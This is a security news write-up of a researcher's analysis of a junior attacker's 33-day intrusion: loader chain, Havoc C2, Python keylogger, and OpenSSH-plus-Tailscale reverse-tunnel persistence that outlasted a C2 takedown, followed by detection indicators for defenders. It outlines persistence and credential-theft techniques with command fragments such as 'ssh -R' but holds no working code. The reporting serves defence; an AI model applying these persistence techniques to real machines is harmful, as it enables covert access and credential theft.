**Cato Networks**’s **Cato CTRL** researcher **Vitaly Simonovich** meticulously documented the entire operation, capturing 339 commands over 33 days. This rare, keyboard-level view of an intrusion was made possible because the operator, known by the handle **Poisson**, left their **SSH** keys and a detailed playbook in an open storage bucket. ### The Attacker's Profile **Poisson** is described not as an **APT**, but rather a junior operator. Their activity patterns, resembling a school schedule (active after 3 p.m. CET with a long midday gap), coupled with the use of free-tier services like **DuckDNS**, **Backblaze B2**, and a cheap **IONOS VPS** in Berlin, suggest a less sophisticated adversary. Despite thin tradecraft, including leaking their home directory multiple times and naming storage buckets after their handle, **Poisson** successfully compromised four machines. ### The Attack Chain The initial compromise involved a highly evasive, memory-resident malware. A **VBScript** stager with a sandbox-evasion delay decrypted a **PowerShell** loader, which then pulled down a **.NET** loader to run **Havoc**'s **Demon** agent without writing it to disk. For privilege escalation, **Poisson** used `Start-Process -Verb RunAs`, which, notably, requires user interaction to bypass **UAC**. After gaining initial access, the attacker established persistence through a scheduled task set to run at every logon with highest privileges, injected shellcode into `Explorer.exe`, and deployed a custom-built **RustDesk** instance as a backup channel. The primary objective was credential theft, achieved via a 70-line **Python** keylogger that wrote keystrokes to a local file. **Poisson** would manually retrieve these files and used `powercfg` to prevent machines from sleeping, ensuring continuous data harvesting. ### The Critical Persistence Move The pivotal moment of the operation occurred on April 7. In a five-hour overnight session, **Poisson** installed **OpenSSH Server** and **Tailscale** on a victim's machine. They then joined the machine to their private **Tailscale** network and configured key-based **SSH** with a reverse tunnel. This established a robust, encrypted connection to the victim's machine, independent of the **Havoc C2** and without exposing any ports. The very next day, the **Havoc** infrastructure went offline. However, due to the established **Tailscale** path, **Poisson**'s access remained uninterrupted. When the **C2** resurfaced on April 26, the agents automatically reconnected, requiring no re-compromise. Over the subsequent five days, the attacker executed 145 more commands, probing smart-card and certificate stores, suggesting an interest in certificate-based logins. They also ran two unexplained executables from a file named `Thales.zip` for approximately 32 minutes before deleting 17 files and going quiet on May 1. **Poisson**'s objectives were narrow: banking logins, email passwords, and government portal credentials. There was no evidence of **Mimikatz** usage, lateral movement, or ransomware deployment, nor any indication of document exfiltration despite browsing tax records and insurance files. For a small business, this direct financial exposure is a significant risk. ### Broader Implications and Detection The tools utilized by **Poisson** are not novel. **China's APT31** has used **Tailscale** to tunnel out of Russian IT firms, and groups like **Scattered Spider** leverage legitimate remote-access tools such as **Ngrok** and **Fleetdeck**. **RustDesk**, **Poisson**'s backup, has also appeared in recent **Akira ransomware** intrusions. The key takeaway is that these legitimate, signed binaries often bypass traditional detection methods focused solely on malicious files, emphasizing the need for behavioral-based detection. **Poisson**'s operation serves as command-level proof that a sophisticated persistence layer can outlast a **C2** takedown, even when implemented by a novice. ### Recommendations for Defenders **Cato Networks** provides a concrete list of indicators to watch for: * Alert on **OpenSSH Server** installations on **Windows** workstations, which are rarely legitimate. * Monitor for `tailscale.exe` on machines that do not have a legitimate reason to run a **VPN**. * Look for `ssh -R` reverse tunnels connecting to external hosts. * Check for `wscript.exe` running **.vbs** files from user staging folders. * Flag scheduled tasks configured with highest privileges that launch script interpreters. * Watch for `powercfg` standby-timeout changes designed to keep machines awake. * Block **DuckDNS**. Crucially, when a **C2** server is identified, security teams must assume it is not the sole access point. A thorough hunt for quiet persistence layers must be conducted. The unanswered question of what `Thales.zip` contained and its purpose underscores the broader point: the **C2** was merely one conduit, not the entire intrusion. Failure to address established backdoors like **OpenSSH**, **Tailscale**, scheduled tasks, and keyloggers leaves the door open for attackers, highlighting a critical gap in many remediation efforts.